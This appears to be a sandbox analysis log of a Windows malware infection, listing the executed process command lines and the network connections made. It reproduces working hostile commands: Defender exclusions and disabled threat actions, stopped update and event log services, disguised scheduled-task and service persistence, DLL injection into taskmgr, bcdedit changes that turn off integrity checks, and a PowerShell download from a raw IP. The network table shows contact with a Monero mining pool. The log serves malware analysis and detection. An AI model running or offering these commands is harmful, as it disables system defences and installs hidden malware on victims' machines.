netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\taskmgr.exe'

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'taskmgr.exe'

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "taskmgr" /tr "C:\ProgramData\taskmgr.exe"

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Users\Admin\Pictures\QanibPG88EdDTe4LokkTgpgy.exe

"C:\Users\Admin\Pictures\QanibPG88EdDTe4LokkTgpgy.exe"

C:\Users\Admin\Pictures\oGO2B7Hw9T58rSVq4mTx85B7.exe

"C:\Users\Admin\Pictures\oGO2B7Hw9T58rSVq4mTx85B7.exe"

C:\Users\Admin\Pictures\StIZ7P5EPsQv5IirTrbqlDGq.exe

"C:\Users\Admin\Pictures\StIZ7P5EPsQv5IirTrbqlDGq.exe"

C:\Users\Admin\Pictures\DwwVFEdVWUvn2FoxG1rKSPIB.exe

"C:\Users\Admin\Pictures\DwwVFEdVWUvn2FoxG1rKSPIB.exe"

C:\Users\Admin\Pictures\sILjO6402z3w1Lh5SoqaJiWO.exe

"C:\Users\Admin\Pictures\sILjO6402z3w1Lh5SoqaJiWO.exe" /s

C:\Users\Admin\Pictures\oGO2B7Hw9T58rSVq4mTx85B7.exe

"C:\Users\Admin\Pictures\oGO2B7Hw9T58rSVq4mTx85B7.exe"

C:\Users\Admin\Pictures\DwwVFEdVWUvn2FoxG1rKSPIB.exe

"C:\Users\Admin\Pictures\DwwVFEdVWUvn2FoxG1rKSPIB.exe"

C:\Users\Admin\Pictures\StIZ7P5EPsQv5IirTrbqlDGq.exe

"C:\Users\Admin\Pictures\StIZ7P5EPsQv5IirTrbqlDGq.exe"

C:\Users\Admin\Pictures\QanibPG88EdDTe4LokkTgpgy.exe

"C:\Users\Admin\Pictures\QanibPG88EdDTe4LokkTgpgy.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\ProgramData\ssa.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $webClient = New-Object System.Net.WebClient; $webClient.Credentials = New-Object System.Net.NetworkCredential('dd', 'mn...123456'); $webClient.DownloadFile('http://193.222.96.193:81/besho/besho.mp4', 'C:\Users\Public\Documents\max3d.zip'); Expand-Archive -Path 'C:\Users\Public\Documents\max3d.zip' -DestinationPath 'C:\Users\Public\Documents\' -Force

C:\Users\Admin\Pictures\E9jY09YwIZOMCa4aCSku1e7V.exe

"C:\Users\Admin\Pictures\E9jY09YwIZOMCa4aCSku1e7V.exe"

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Users\Admin\Pictures\9xLahnDaW8DqylZLETlYa7up.exe

"C:\Users\Admin\Pictures\9xLahnDaW8DqylZLETlYa7up.exe"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "WSNKISKT"

C:\Users\Admin\Pictures\360TS_Setup.exe

"C:\Users\Admin\Pictures\360TS_Setup.exe" /c:WW.Declan.CPI202403 /pmode:2 /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo= /s

C:\Users\Admin\AppData\Local\Temp\7zS2858.tmp\Install.exe

.\Install.exe /tEdidDDf "385118" /S

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"

C:\Users\Admin\Pictures\RNOd9rzZPNNp8RdelatvkqtI.exe

"C:\Users\Admin\Pictures\RNOd9rzZPNNp8RdelatvkqtI.exe"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "WSNKISKT"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\ProgramData\wikombernizc\reakuqnanrkn.exe

C:\ProgramData\wikombernizc\reakuqnanrkn.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Program Files (x86)\1715650666_0\360TS_Setup.exe

"C:\Program Files (x86)\1715650666_0\360TS_Setup.exe" /c:WW.Declan.CPI202403 /pmode:2 /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo= /s /TSinstall

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Users\Admin\Pictures\YXEpkSUwRVhoq2SS2U9FWKNy.exe

"C:\Users\Admin\Pictures\YXEpkSUwRVhoq2SS2U9FWKNy.exe"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Users\Admin\AppData\Local\Temp\7zS58BB.tmp\Install.exe

.\Install.exe /tEdidDDf "385118" /S

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\ProgramData\taskmgr.exe

C:\ProgramData\taskmgr.exe

C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe

C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 01:39:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\jziWkkV.exe\" it /aMndidoyAM 385118 /S" /V1 /F

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"

C:\Windows\SysWOW64\cmd.exe

/C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ

\??\c:\windows\SysWOW64\schtasks.exe

schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 01:39:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\dWzoUBP.exe\" it /qHsdidCStf 385118 /S" /V1 /F

C:\Windows\system32\taskeng.exe

taskeng.exe {5754BB83-D226-482A-8CFB-A175B53CC129} S-1-5-18:NT AUTHORITY\System:Service:

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"

C:\Windows\SysWOW64\cmd.exe

/C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ

\??\c:\windows\SysWOW64\schtasks.exe

schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -timeout 0

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\bcdedit.exe

C:\Windows\Sysnative\bcdedit.exe /v

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\ProgramData\Google\Chrome\updater.exe

C:\ProgramData\Google\Chrome\updater.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

C:\Windows\explorer.exe

explorer.exe

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe

C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe

Network

Country Destination Domain Proto
RU 5.42.96.7:80 5.42.96.7 tcp
RU 77.221.151.47:80 77.221.151.47 tcp
RU 185.215.113.67:26260 tcp
RU 77.221.151.47:8080 tcp
RU 5.42.96.78:80 5.42.96.78 tcp
RU 77.221.151.47:9090 tcp
DE 185.172.128.19:80 185.172.128.19 tcp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 yip.su udp
US 104.20.4.235:443 pastebin.com tcp
RU 77.221.151.47:8080 tcp
US 8.8.8.8:53 xmr.2miners.com udp
DE 162.19.139.184:2222 xmr.2miners.com tcp
DE 185.172.128.19:80 185.172.128.19 tcp
US 8.8.8.8:53 file-file-host6.com udp
RU 5.101.50.183:80 file-file-host6.com tcp
US 188.114.97.2:443 yip.su tcp
US 8.8.8.8:53 parrotflight.com udp
US 104.21.84.71:443 parrotflight.com tcp
US 8.8.8.8:53 junglethomas.com udp
US 104.21.92.190:443 junglethomas.com tcp
RU 77.221.151.47:8080 tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
RU 77.221.151.47:8080 tcp
US 8.8.8.8:53 1c9bb470-7aa7-4487-b3b5-8c04669c994f.uuid.statstraffic.org udp
RU 77.221.151.47:8080 tcp
US 8.8.8.8:53 msdl.microsoft.com udp
US 204.79.197.219:443 msdl.microsoft.com tcp
US 8.8.8.8:53 vsblobprodscussu5shard30.blob.core.windows.net udp
US 20.150.38.228:443 vsblobprodscussu5shard30.blob.core.windows.net tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 104.20.3.235:443 pastebin.com tcp
RU 77.221.151.47:8080 tcp
RU 5.42.96.64:80 5.42.96.64 tcp
RU 5.42.96.78:80 5.42.96.78 tcp
US 8.8.8.8:53 onlycitylink.com udp
US 8.8.8.8:53 realdeepai.org udp
US 8.8.8.8:53 1xst.ru udp
US 8.8.8.8:53 onlycitylink.com udp
RU 5.42.96.78:80 5.42.96.78 tcp
US 8.8.8.8:53 realdeepai.org udp
US 8.8.8.8:53 free.360totalsecurity.com udp
US 188.114.96.2:443 realdeepai.org tcp
US 172.67.182.192:443 onlycitylink.com tcp
US 104.21.18.166:443 onlycitylink.com tcp
US 172.67.193.79:443 realdeepai.org tcp
US 8.8.8.8:53 jonathantwo.com udp
US 8.8.8.8:53 firstfirecar.com udp
US 8.8.8.8:53 firstfirecar.com udp
US 8.8.8.8:53 jonathantwo.com udp
US 104.21.60.76:443 firstfirecar.com tcp
US 188.114.96.2:443 jonathantwo.com tcp
US 104.21.31.124:443 jonathantwo.com tcp
US 104.21.60.76:443 firstfirecar.com tcp
US 8.8.8.8:53 apps.identrust.com udp
US 8.8.8.8:53 apps.identrust.com udp
US 8.8.8.8:53 apps.identrust.com udp
US 8.8.8.8:53 apps.identrust.com udp
NL 23.63.101.171:80 apps.identrust.com tcp
NL 23.63.101.170:80 apps.identrust.com tcp
NL 23.63.101.171:80 apps.identrust.com tcp
DE 151.236.118.173:443 free.360totalsecurity.com tcp
NL 23.63.101.170:80 apps.identrust.com tcp
KR 211.168.53.110:80 1xst.ru tcp
KR 211.168.53.110:80 1xst.ru tcp
US 8.8.8.8:53 beshomandotestbesnd.run.place udp
US 45.88.186.125:7000 beshomandotestbesnd.run.place tcp
RU 77.221.151.47:8080 tcp
US 8.8.8.8:53 st.p.360safe.com udp
US 8.8.8.8:53 iup.360safe.com udp
US 8.8.8.8:53 tr.p.360safe.com udp
